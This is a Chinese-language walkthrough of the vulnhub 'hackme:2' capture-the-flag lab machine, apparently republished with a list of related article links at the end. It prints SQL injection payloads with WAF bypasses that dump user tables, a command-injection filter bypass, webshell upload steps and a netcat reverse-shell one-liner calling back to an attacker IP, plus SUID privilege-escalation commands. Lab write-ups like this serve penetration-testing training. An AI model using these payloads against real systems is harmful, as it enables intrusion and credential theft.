hackme:2 靶機攻略

2021-02-18 安全客

 

0x01 背景:

hackme:2是vulnhub上的一個medium難度的CTF靶機,難度適中、內容豐富,貼近實戰。而且沒有太多的腦洞,適合安全工作者們用來練習滲透測試,然而唯一的缺憾是目前沒有公開的攻略,因此把個人的通關過程記錄於此,作為攻略分享給大家!

 

0x02 技術關鍵詞:

SQL注入、WAF Bypass、模糊測試、文件上傳、suid提權

 

0x03 靶機發現與埠掃描

做vulnhub上的靶機的第一步,所有的靶機都是一樣的套路,不在這裡多費筆墨。

 

0x04 SQL注入與WAF Bypass

打開位於80埠的Web頁面,註冊一個測試帳號wangtua/wangtua,就可以登錄系統了,可以發現是一個書店系統。

進入系統之後發現有一個搜索框,SQL注入的套路很明顯了。要做SQL注入、第一步就是猜測SQL語句的格式和注入點。

1、探測SQL格式,WAF規則

本搜索框的功能是檢索資料庫中的書名、當搜索框為空的時候,可以返回所有的內容,

當搜索框中只包含書名的前一部分的時候,也可以返回對應的內容:

因此我們猜測SQL語句格式為(%代表通配符,可以匹配零個或者多個任意字符):

$sql = "SELECT * FROM BOOKS WHERE book_name LIKE '".$input."%';"
基於此,我們構造如下payload:
Linux%' and '123' like '1
使用另一個payload:
發現無法返回結果
可以驗證我們的想法。
然而我們使用資料庫函數的時候卻出現了問題:
Payload:
Linux%'/**/and database() like/**/'
沒有返回內容,而當我們使用注釋符來代替空格的時候,則可以執行成功。
2、構造Payload
通過構造聯合查詢,一步一步獲取出資料庫名,表名,列名和欄位
Linux%'unionselectdatabase(),'2','3
Linux%'unionselectgroup_concat(table_name),"2","3"frominformation_schema.tableswheretable_schemalike'webapp
Linux%'unionselectgroup_concat(column_name),"2","3"frominformation_schema.columnswheretable_namelike'users'andtable_schemalike'webapp
Linux%'unionselectgroup_concat(user),'2',group_concat(pasword)fromuserswhere'1'like'
到此為止我們發現了一個superadmin的帳號,將md5值在線解碼之後發現是Uncrackable
 
0x05 模糊測試與命令執行
進入超級管理員帳號之後,我們發現了一個可以進行文件上傳的點,
上傳cat.jpg之後,頁面上回顯了上傳路徑。
然而我們卻無法直接訪問任何文件。
接下來我們注意到下面兩個輸入框,可以將處理結果回顯到頁面上,這裡我除了想到XSS之外。還想到了測試命令注入或者模板注入。可以發現在Last Name輸入框裡輸入7*7,可以返回49
我們可以使用BurpSuite專業版的Intruder模塊來進行模糊測試。
Payload選擇模糊測試-完整,
點擊開始攻擊。
攻擊完成之後可以發現 `id` 這個payload有命令執行的回顯。
我們換其他命令來執行,例如pwd,ls都可以正確執行而cat命令無法執行,猜測其過濾了空格,我們使用cat<welcomeadmin.php這個payload來繞過過濾。
可以看到在返回包裡洩露的welcomeadmin.php的完整原始碼,包括文件上傳的絕對路徑。
以及命令執行的成因:
使用哥斯拉生成木馬並上傳,發現php後綴被過濾,換成php3等也不行。
後綴改成png之後才上傳成功,然而無法正常解析成PHP文件。
這裡考慮使用剛才的命令執行漏洞,將文件名改成god.php
使用哥斯拉進行連接,發現連接成功
 
0x06 後滲透與提權
為了可以有更好的交互環境,我們用kali自帶的weevely生成木馬並連接,完成連接之後使用nc反彈shell:
由於靶機的nc版本特殊,無法使用nc -e選項,因此這裡使用了如下的payload
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.48.129 2333 >/tmp/f
(來自參考資料2)
使用pyhton偽終端命令,可以在偽終端執行sudo等命令
使用命令find / -perm -u=s -type f 2>/dev/null來發現設置了suid位的應用程式(參考資料1)
關於suid提權的原理,可以參考P師傅的博客(參考資料3)。
發現home目錄下有一個可疑的文件,執行一下之後發現順利get root權限。

 
0x07 總結與復盤:
這臺靶機感覺製作的比較用心,SQL注入和文件上傳等部分都比較貼近實戰,唯一美中不足的是提權部分有些太過簡單。目前本人正在備考OSCP,在vulnhub和HTB上做了不少靶機,打算最近把vulnhub上後滲透的套路總結一下,再發一篇文章,希望大家支持一下。
 
0x08 參考資料:
1) https://payatu.com/guide-linux-privilege-escalation
2) https://github.com/swisskyrepo/PayloadsAllTheThings
3) https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html
(點擊「閱讀原文」查看連結)

相關焦點

  • HTB-靶機-Jail
    VIP使用退役靶機操作,顯示IP位址為10.10.10.34本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描執行命令autorecon 10.10.10.34 -o .
  • 《家園2》當玩家打掉所有的靶機後,瓦格族便開始入侵了
    4、指揮攔截機攻擊靶機(Use the Interceptors to destroy the target drones.)5、打敗入侵的瓦格族戰機(Defeat Vaygr forces at Chimera.)6、保護母艦(Protect the Mothership)
  • 臺軍聯合實彈演戲試射 靶機掉落臺東縣街頭(圖)
    臺軍聯合實彈演戲試射 靶機掉落臺東縣街頭(圖) 2012年07月09日 14:27 來源:中國臺灣網 字號:  小  中  大 轉發
  • 衝繩發現帶漢字無人靶機 臺灣研究機構:我們的
    (觀察者網訊)日本衝繩海岸近日發現一架來歷不明的無人機,機身上標有字以及美軍無人靶機字母編號,他的歸屬引發輿論關注。臺灣地區「中科院」今天出面坦承,是該院所屬的靶機。衝繩海岸的無人靶機 視頻截圖據臺灣「聯合新聞網」9月11日報導,臺灣「中科院」本身有靶機使用能力,今天下午發出新聞稿坦承,初步分析這架「MQM-107E」靶機,是日前配合演訓使用的無人靶機,靶機屬一般訓練用途,沒有裝置機敏裝備及參數。
  • typhoon靶機滲透
    前言&靶機簡介這個靶機挺多漏洞,知識點很廣,所以決定自己來打一遍,算是複習一些很久前的知識點,就從一個埠一個埠來滲透吧,看看有什麼知識點
  • 漢光演習第二日蔡英文視察臺軍飛彈發射 臺軍靶機尾焰引發森林大火
    據聯合新聞網6月5日報導,在今天的漢光實兵操演上,蔡英文視察臺灣空軍發射靶機時,靶機火箭發動機尾焰引燃了基地附近的草坪,造成基地附近山林失火,隨後軍方派出消防車救火,在撲滅火焰後演習繼續進行。 靶機發射後基地失火 ,冒出滾滾濃煙 圖源:聯合新聞網
  • 砥礪過硬的戰場「磨刀石」——記中部戰區空軍某訓練基地靶機分隊...
    紅軍指揮員想見的對手正是湯俊林——中部戰區空軍某訓練基地靶機分隊分隊長。這次演習中,湯俊林負責放飛和操縱靶機。「湯俊林往往『不按常理出牌』,讓對手很頭疼!」湯俊林的教導員馬志宇說。「不按常理出牌」的湯俊林讓空軍地空飛彈某營官兵記憶深刻。
  • 山姆大叔財大氣粗:很多國家買不起的三代機 它居然用來當靶機
    第三種就比較普遍了,一般是改裝成靶機,以供防空演練之用。而美國目前的靶機有兩種,一種是QF4、另一種是QF16。顧名思義,"QF4"就是F4"鬼怪"戰機退役後成為了靶機;"QF16"則是F16"戰隼"。許多國家由於經濟或者外交因素無法獲得這兩款戰機,進而感嘆美國空軍對裝備的"浪費"。
  • 新手入門靶機BEE-BOX教程—環境搭建(一)
    被表哥們揍在角落的我,想起剛好最近也在玩Bee-box靶機,想著是不是也可以作為入門基礎的思路走一波。之所以這麼覺得,是因為,比起網上各種各類的靶機,bee-box題目很多,涉及比較多經典案例。對於個人而言覺得,bee-box靶機對於漏洞的範圍較多。對於入門人員來說接觸比較廣泛,思路比較全,跟著題目、教程走上手快點。
  • 新手入門靶機BEE-BOX教程—第一章A1(二)
    ,傳送門:新手入門靶機BEE-BOX教程—環境搭建(一)0x01  BEE-BOX習題:A1-Injection原理註:本文儘量尋找通俗易懂原理,如果有不清楚等地方,可以看著靶機進行走一遍,我所做的靶機題目都是屬於LOW,請大神勿噴。
  • 新手入門靶機BEE-BOX教程—第二章A5(六)
    原理請移步:https://blog.csdn.net/weixin_43355264/article/details/104028786CORS跨域詳解:http://www.ruanyifeng.com/blog/2016/04/cors.html註:本文儘量尋找通俗易懂原理,如果有不清楚等地方,可以看著靶機進行走一遍,我所做的靶機題目都是屬於LOW,
  • 臺灣「中科院」認領衝繩海岸美制無人靶機:8月演習時墜海,當時沒找到
    【文/觀察者網 熊超然】9月8日,據多家日媒報導,日本衝繩縣海岸漂來一架來歷不明的無人機,機身上標有「左」、「右」這樣的漢字,以及美軍無人靶機MQM-107E的字母編號。11日下午,臺灣「中科院」終於出面「認領」,稱這一機體為該院的無人靶機。衝繩海岸近日發現的無人機,機身上有MQM-107E字樣 視頻截圖據臺灣「中央社」11日報導,臺「中科院」當天下午對外透露,經過初步研判,這一漂流至日本的機體為8月配合演習訓練所使用的無人靶機,屬於一般訓練用途,機上並沒有機敏裝置及參數。
  • 從玩轉靶機DVWA看程序設計安全
    前言靶機,在軍事領域意指作為射擊訓練目標的一種軍用飛行器。類似地,在網絡安全行業,靶機,也稱靶場,泛指作為滲透測試用途的一種軟體或系統。常見的滲透測試靶機系統有DVWA、Metasploitable、mutillidaemutillidae、SQLol、hackxor、BodgeIt、Exploit KB、WackoPicko、OWASP Hackademic、WebGoat、XSSeducation、Web for Pentester、Lazysysadmin等等,舉不勝舉。DVWA就是其中最著名、最基礎的靶場。
  • Vulnhub靶機實戰之HA: Forensics
    目標:獲得4個flag靶機下載地址:https://www.vulnhub.com/entry/ha-forensics,570/本文涉及知識點實操練習--Vulnhub滲透測試實戰靶場Drupal https://www.hetianlab.com/expc.do?
  • DC-4靶機解題思路
    說明:Vulnhub是一個滲透測試實戰網站,提供了許多帶有漏洞的滲透測試靶機下載
  • 滲透測試實戰——prime靶機入侵
    Ip:192.168.0.115Kali:192.168.0.21安裝好的靶機界面Nmap掃描埠【-url http://192.168.0.115/wordpress/ --enumerate vt,vp,u對wordpress進行掃描,最後只得到如下信息主題WordPresstheme in use: twentynineteen版本WordPressversion 5.2.2
  • OSCP考證全攻略
    網上對於OSCP認證的中文介紹很少,也沒看到詳細攻略,但在國內已經越來越受到企業的認可,參加考試的人也越來越多了。本文簡述OSCP考證相關問題,給需要的朋友參考。一、OSCP認證是什麼?首先介紹下OSCP認證,目前安全技術類的證書有很多,像是CEH,Security+,CISSP等等。
  • 紀念碑谷2第5關攻略 紀念碑谷2 1—10攻略大全
    導 讀 紀念碑谷2第5關攻略 紀念碑谷2第5關通關圖文攻略 第5關攻略 紀念碑谷2 1—10攻略大全"
  • anomaly2 攻略:iOS版關卡全攻略
    anomaly2 攻略:iOS版關卡全攻略 來源:www.18183.com作者:集落時間:2013-12-23 本文小編主要給大家介紹anomaly2 iOS版關卡全攻略,幫助大家快速通關anomaly2。